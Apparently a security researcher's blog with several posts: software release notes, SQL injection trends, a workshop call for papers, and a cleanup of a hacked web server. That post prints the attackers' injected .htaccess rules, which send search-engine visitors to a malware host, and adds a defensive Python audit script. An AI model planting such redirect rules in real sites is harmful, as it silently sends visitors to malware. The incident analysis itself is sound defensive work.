
Systrace 1.6f with 64-bit Linux ptrace support

A new version of Systrace that supports 64-bit Linux installations can be downloaded from here. The major changes are support of 64-bit Linux with ptrace as well as 32-bit binaries under a 64-bit system. Let me know if you run into any issues with this.
Categories: News, Systrace

Libevent 1.4.9-stable released

We just released libevent 1.4.9-stable. You can download the source from the usual place:

http://monkey.org/~provos/libevent-1.4.9-stable.tar.gz
This release fixes a number of bugs:
  • fixed several memory leaks in the HTTP layer.
  • fixed signal handling for multi-threaded applications.
  • fixed issues with the timer cache when leaving/entering the event loop.
Check here for a more detailed change list.

Thanks to Dean McNamee, Victor Chang, Alejo Sanchez, Richard Jones, Robin Haberkorn and everyone else who reported bugs or supplied patches.
Categories: Libevent, News

Using htaccess To Distribute Malware

Usually, I get to find compromised web servers, but last week I was asked to fix one. A relative noticed that his web server would try to install a rogue anti-malware product and called me for help. Curiously, the malware showed up only when clicking on the search results for his web site, but the site was fine when typing the address directly into the location bar. A little investigation with curl could reproduce that behavior:
curl -I -H "Referer: www.google.com" http://www.foo.com/

returned a 302 redirect to an IP address, whereas
curl -I http://www.foo.com/

returned a 200. To find where the code might have been injected, I grepped the whole web server for the IP address and found the following gem in .htaccess:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L]

This code instructs the web server to redirect visitors to a malware site if they come from popular search engines.
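As an added example (not code from the original post), here is a small Python audit that generalizes the grep step above: instead of searching the server for one known IP address, it walks a document root and flags every .htaccess RewriteRule that sends visitors to an external host while being guarded by RewriteCond checks on HTTP_REFERER. The sample .htaccess content and the host name www.foo.com are constructed from the post; SAMPLE_HTACCESS, find_referer_redirects and audit_tree are names chosen here.

```python
import os
import re
from urllib.parse import urlsplit

# Constructed sample (assumption): the rule from the post plus a benign redirect.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L]
RewriteRule ^old/(.*)$ /new/$1 [R=301,L]
"""

COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)

def find_referer_redirects(htaccess_text, own_hosts):
    """Return (line_no, target, referer_patterns) for each RewriteRule whose
    target is an absolute URL on a host outside own_hosts and that is guarded
    by at least one RewriteCond on %{HTTP_REFERER}."""
    findings = []
    pending = []  # referer patterns from RewriteCond lines not yet consumed
    for no, line in enumerate(htaccess_text.splitlines(), 1):
        m = COND_RE.match(line)
        if m:
            if m.group(1).upper() == "%{HTTP_REFERER}":
                pending.append(m.group(2))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        target = m.group(2)
        host = urlsplit(target).hostname  # None for relative targets
        if pending and host and host not in own_hosts:
            findings.append((no, target, list(pending)))
        pending = []  # mod_rewrite: a RewriteRule consumes the preceding conditions
    return findings

def audit_tree(docroot, own_hosts):
    """Walk docroot and map each .htaccess path to its suspicious rules."""
    report = {}
    for dirpath, _, files in os.walk(docroot):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as f:
            hits = find_referer_redirects(f.read(), own_hosts)
        if hits:
            report[path] = hits
    return report
```

Run audit_tree against the document root with the site's own host names; anything it reports deserves the same manual look the post describes, since legitimate referer-based rules on external hosts are rare.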

The attackers were able to insert this file as the web application had a remote file inclusion vulnerability. These attacks are quite popular as we found in our paper: To Catch a Predator: A Natural Language Approach for Eliciting Malicious Payloads. The fix in this case was to remove the .htaccess file and to upgrade the web application to a patched version without the vulnerability.
Categories: Malware, SpyBye

Moon, Jupiter and Venus

Jupiter, Venus and Moon are currently in close conjunction in the evening sky. It is quite an amazing sight and can still be seen tomorrow, too. Over Thanksgiving, we also set up the telescope in front of the house to look at the moons of Jupiter, which was quite fun. I tried to take a quick picture of the Moon, Jupiter and Venus, but got it overexposed. The extreme light pollution in Mountain View makes it difficult to take any pictures of the night sky.

The light pollution here is so bad that most stars are never visible. I assume there must be a good reason to waste so much electricity on lighting up the sky - I just don't know it.

SQL Injection Redux

During my invited talk on web-based malware at USENIX Security, I mentioned SQL Injection as one of the more popular means of compromising web servers. Although I did not have a chance to post my slides, here is one graph that shows how many URLs with drive-by downloads due to SQL injection were found by Google's infrastructure in July 2008; it's over 800,000 URLs. Curiously, most of these were due to the Asprox botnet.

The situation has changed slightly since then: Asprox has become quiet, and most of the SQL injection attacks now seem to originate from Chinese sites. One way to determine whether a site has been injected with malicious content is the Safe Browsing diagnostic page, which shows the infection domains and also how many sites they compromised. Here is an example of a Chinese SQL injection domain, ko118.cn.

To help web application developers, OWASP has published detailed guidelines on preventing SQL injection attacks. More importantly, if your web site has been SQL injected, its database needs to be cleaned to remove the injected content; patching the application alone does not undo what was already written into it.
Categories: Malware, SpyBye

LEET '09 Call for Papers

The CfP for the 2nd USENIX Workshop on Large-Scale Exploits and Emergent Threats (LEET '09): Botnets, Spyware, Worms, and More is up at:

http://www.usenix.org/event/leet09/cfp/.

LEET '09 will be held on April 21, 2009 in Boston, MA immediately before the 6th USENIX Symposium on Networked Systems Design and Implementation (NSDI '09), which will take place April 22–24, 2009.

Important Dates
  • Submissions due: January 16, 2009, 11:59 p.m. EST
  • Notification of acceptance: March 2, 2009
  • Electronic files due: March 30, 2009

This will be the second edition of LEET, which evolved from the combination of two other successful workshops, the ACM Workshop on Recurring Malcode (WORM) and the USENIX Workshop on Hot Topics in Understanding Botnets (HotBots). These two workshops each dealt with aspects of this problem. However, while papers relating to both worms and botnets are explicitly solicited, LEET has a broader charter than its predecessors. We encourage submissions of papers that focus on any aspect of the underlying mechanisms used to compromise and control hosts, the large-scale "applications" being perpetrated upon this framework, or the social and economic networks driving these threats.
Categories: News, Security, Systrace